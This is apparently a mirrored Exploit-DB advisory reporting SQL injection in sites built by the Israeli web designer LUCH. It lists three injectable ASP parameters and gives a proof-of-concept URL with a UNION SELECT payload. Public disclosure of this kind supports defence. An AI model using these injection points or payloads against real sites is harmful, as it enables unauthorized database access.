exploit-db-mirror/platforms/asp/webapps/16953.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

14 lines
309 B
Text
Executable file

Title : Web Designed by LUCH Vulnerable to SQL Injection
Vendor : http://www.luch.co.il
Found by: p0pc0rn
SQL
---
http://site.com/page.asp?id=[SQL]
http://site.com/cat.asp?catid=[SQL]
http://site.com/catin.asp?productid=[SQL]
POC
---
http://site.com/page.asp?id=23 union select 1 from test.a